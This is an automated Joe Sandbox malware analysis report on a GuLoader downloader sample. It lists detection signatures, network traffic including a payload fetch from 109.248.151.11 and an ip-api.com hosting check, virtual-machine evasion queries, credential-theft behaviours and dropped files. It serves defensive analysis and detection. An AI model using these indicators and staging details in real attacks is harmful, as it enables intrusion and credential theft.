Edit tour

Windows Analysis Report
99200032052824.bat.exe

Overview

General Information

Sample name:	99200032052824.bat.exe
Analysis ID:	1447846
MD5:	085de7ac75bbd791c1b1f979fe8ff78c
SHA1:	f33f25a99dbf0f7b9c2ad2bc886e7748cb5d888f
SHA256:	f76bdeb70f9927c49aa87d92d92eb93d05317a3bde63da7a78a11033b29b41ab
Infos:

Detection

GuLoader

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Check if machine is in data center or colocation facility

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

99200032052824.bat.exe (PID: 8652 cmdline: "C:\Users\user\Desktop\99200032052824.bat.exe" MD5: 085DE7AC75BBD791C1B1F979FE8FF78C)

99200032052824.bat.exe (PID: 7240 cmdline: "C:\Users\user\Desktop\99200032052824.bat.exe" MD5: 085DE7AC75BBD791C1B1F979FE8FF78C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.1301032668397.0000000037647000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1296162651331.0000000005B73000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: 99200032052824.bat.exe PID: 8652	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 99200032052824.bat.exe	ReversingLabs: Detection: 13%
Source: 99200032052824.bat.exe	Virustotal: Detection: 20%			Perma Link

Machine Learning detection for sample

Source: 99200032052824.bat.exe

Joe Sandbox ML: detected

Source: 99200032052824.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 99200032052824.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 5_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	5_2_00405768
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 5_2_004062A3 FindFirstFileA,FindClose,	5_2_004062A3
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 5_2_004026FE FindFirstFileA,	5_2_004026FE
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	9_2_00405768
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_004026FE FindFirstFileA,	9_2_004026FE
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_004062A3 FindFirstFileA,FindClose,	9_2_004062A3

Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View

ASN Name: TUT-ASUS TUT-ASUS

Source: unknown

DNS query: name: ip-api.com

Source: global traffic

HTTP traffic detected: GET /LZJRCXHEEshk185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 109.248.151.11Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.11

Source: global traffic	HTTP traffic detected: GET /LZJRCXHEEshk185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 109.248.151.11Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ip-api.com

Source: 99200032052824.bat.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 99200032052824.bat.exe, 00000005.00000000.1295915464666.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 99200032052824.bat.exe, 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Code function: 5_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,

5_2_00405205

Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		5_2_0040320C
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		9_2_0040320C

Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 5_2_00404A44	5_2_00404A44
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 5_2_00406F54	5_2_00406F54
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 5_2_0040677D	5_2_0040677D
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 5_2_73A31A98	5_2_73A31A98
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_00404A44	9_2_00404A44
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_00406F54	9_2_00406F54
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_0040677D	9_2_0040677D
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_00169028	9_2_00169028
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_001688BB	9_2_001688BB
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_001638F8	9_2_001638F8
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_00164910	9_2_00164910
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_0016C360	9_2_0016C360
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_0016F6A0	9_2_0016F6A0
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_00164040	9_2_00164040
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_0016E98A	9_2_0016E98A
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_375F7700	9_2_375F7700
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_375F8668	9_2_375F8668
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_375F2690	9_2_375F2690
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_375F1CA0	9_2_375F1CA0
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_375F3750	9_2_375F3750
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_375FA880	9_2_375FA880
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_0016C648	9_2_0016C648

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Code function: String function: 00402ACB appears 48 times

Source: 99200032052824.bat.exe, 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameskrumpeleverne.exeD vs 99200032052824.bat.exe
Source: 99200032052824.bat.exe, 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameskrumpeleverne.exeD vs 99200032052824.bat.exe
Source: 99200032052824.bat.exe, 00000009.00000002.1301021306350.0000000006DA3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 99200032052824.bat.exe

Source: 99200032052824.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal96.troj.spyw.evad.winEXE@3/23@1/2

Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		5_2_0040320C
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		9_2_0040320C

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Code function: 5_2_004044D1 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

5_2_004044D1

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Code function: 5_2_004020D1 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,

5_2_004020D1

Source: C:\Users\user\Desktop\99200032052824.bat.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle

Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\99200032052824.bat.exe

File created: C:\Users\user\AppData\Local\Temp\nsxD41F.tmp

Jump to behavior

Source: 99200032052824.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\99200032052824.bat.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\99200032052824.bat.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 99200032052824.bat.exe	ReversingLabs: Detection: 13%
Source: 99200032052824.bat.exe	Virustotal: Detection: 20%

Source: C:\Users\user\Desktop\99200032052824.bat.exe

File read: C:\Users\user\Desktop\99200032052824.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"	Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe

File written: C:\Users\user\AppData\Local\Temp\tmc.ini

Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: 99200032052824.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: 99200032052824.bat.exe PID: 8652, type: MEMORYSTR
Source: Yara match	File source: 00000005.00000002.1296162651331.0000000005B73000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Code function: 5_2_73A31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

5_2_73A31A98

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Code function: 5_2_73A32F20 push eax; ret

5_2_73A32F4E

Source: C:\Users\user\Desktop\99200032052824.bat.exe

File created: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Nydannelses.Aar	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Krapyls172.syg	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\parallelopipedon.idi	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Mattias.nap	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Sestertius.djv	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Slidsomt.bra	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\afkontrollere.urb	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\afslres.ten	Jump to behavior
